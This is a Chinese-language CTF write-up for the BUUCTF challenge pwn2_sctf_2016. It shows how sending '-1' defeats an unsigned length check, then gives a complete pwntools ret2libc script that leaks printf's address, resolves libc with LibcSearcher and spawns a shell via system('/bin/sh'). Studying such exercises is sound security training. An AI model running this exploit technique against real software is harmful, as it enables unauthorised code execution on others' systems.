[BUUCTF-pwn]——pwn2_sctf_2016
老规矩还是先checksec一下,
在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。
最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。
思路
利用printf泄露printf的实际地址, 通过计算偏移,以此来找到system 和 ‘/bin/sh’
但是中间你会发现有个32的限制, 仔细观察 变量类型你就会发现 get_n的第二个参数的类型是 unsigned int 类型, int 类型的负数, 在这里对应的就是正数, 而且还是很大的正数。可以用来绕过检查。
注意不要如下写, 里面有 %u 孩子在这里卡了一下
p.sendlineafter("Ok, sounds good. Give me %u bytes of data!\n", payload)
exploit
from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",25008)
elf = ELF("./pwn2_sctf_2016")
context.log_level = 'debug'
printf_plt = elf.plt["printf"]
printf_got = elf.got["printf"]
s_addr = 0x080486F8
vuln_addr = 0x0804852F
payload = "a" * (0x2c + 0x4) + p32(printf_plt) + p32(vuln_addr) + p32(s_addr) + p32(printf_got)
p.sendlineafter("How many bytes do you want me to read? ", '-1')
p.sendlineafter("bytes of data!\n", payload)
p.recvline()
p.recvuntil("You said: ")
printf_addr = u32(p.recv(4))
print hex(printf_addr)
libc = LibcSearcher('printf', printf_addr)
libcbase = printf_addr - libc.dump('printf')
system_addr = libcbase + libc.dump('system')
binsh = libcbase + libc.dump('str_bin_sh')
payload = "a" * (0x2c + 0x4) + p32(system_addr) + p32(vuln_addr) + p32(binsh)
p.sendlineafter("How many bytes do you want me to read? ", '-1')
p.sendlineafter("bytes of data!\n", payload)
p.interactive()
遗憾
通过旁边的do_thing函数可以找到 int 80 汇编指令。由于上一题碰到了, 这一题想试试是否可以通过execve("/bin/sh", NULL, NULL) 来解决, 我觉得应该可以不知道, 你有没有兴趣尝试一下, 做出来了。如果可以给我分享一下吗 😃
希望你可以成功哦!!!
今年大年初一, 祝大家新年快乐, 平安喜乐 😃